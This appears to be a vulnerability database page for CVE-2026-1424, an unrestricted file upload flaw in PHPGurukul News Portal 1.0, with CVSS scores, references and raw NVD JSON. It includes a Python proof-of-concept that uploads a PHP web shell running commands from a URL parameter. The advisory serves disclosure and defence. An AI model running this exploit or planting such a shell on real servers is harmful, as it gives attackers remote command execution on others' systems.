CVE-2026-1424

Description

A vulnerability was identified in PHPGurukul News Portal 1.0. This affects an unknown part of the component Profile Pic Handler. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit is publicly available and might be used.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:phpgurukul:news_portal:1.0:*:*:*:*:*:*:* - VULNERABLE

PHPGurukul News Portal 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2026-1424 PoC - PHPGurukul News Portal 1.0 Unrestricted File Upload
# Target: Profile Pic Handler component

target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target.com/news-portal"

# Malicious PHP file to be uploaded
php_shell = '''<?php
if(isset($_GET['cmd'])) {
    echo "<pre>";
    $cmd = $_GET['cmd'];
    system($cmd);
    echo "</pre>";
}
?>'''

def exploit_unrestricted_upload():
    """Exploit the unrestricted file upload vulnerability"""
    
    # Upload endpoint (Profile Pic Handler)
    upload_url = f"{target_url}/profile_pic_upload.php"
    
    # Prepare malicious file
    files = {
        'profile_pic': ('shell.php', php_shell, 'image/php')
    }
    
    # Cookies for authenticated session (high privilege required)
    cookies = {
        'PHPSESSID': 'your_session_id_here'
    }
    
    try:
        print(f"[*] Attempting to upload malicious file to {upload_url}")
        response = requests.post(upload_url, files=files, cookies=cookies, timeout=10)
        
        if response.status_code == 200:
            print("[+] File uploaded successfully!")
            print(f"[*] Access the shell at: {target_url}/uploads/shell.php?cmd=whoami")
        else:
            print(f"[-] Upload failed with status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    exploit_unrestricted_upload()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-1424
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-1424
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-1424/
[4] VulDB https://vuldb.com/cve/CVE-2026-1424
[5] https://github.com/rsecroot/News-Portal/blob/main/Cross%20Site%20Scripting.md
[6] https://phpgurukul.com/
[7] https://vuldb.com/?ctiid.342840
[8] https://vuldb.com/?id.342840
[9] https://vuldb.com/?submit.736637

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-1424", "sourceIdentifier": "[email protected]", "published": "2026-01-26T07:16:08.063", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in PHPGurukul News Portal 1.0. This affects an unknown part of the component Profile Pic Handler. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit is publicly available and might be used."}, {"lang": "es", "value": "Una vulnerabilidad fue identificada en PHPGurukul News Portal 1.0. Esto afecta una parte desconocida del componente Profile Pic Handler. La manipulación conduce a una carga sin restricciones. Es posible iniciar el ataque remotamente. El exploit está disponible públicamente y podría ser usado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phpgurukul:news_portal:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "70433F59-D09B-4F66-981A-FFE1598906E2"}]}]}], "references": [{"url": "https://github.com/rsecroot/News-Portal/blob/main/Cross%20Site%20Scripting.md", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}, {"url": "https://phpgurukul.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://vuldb.com/?ctiid.342840", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.342840", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.736637", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}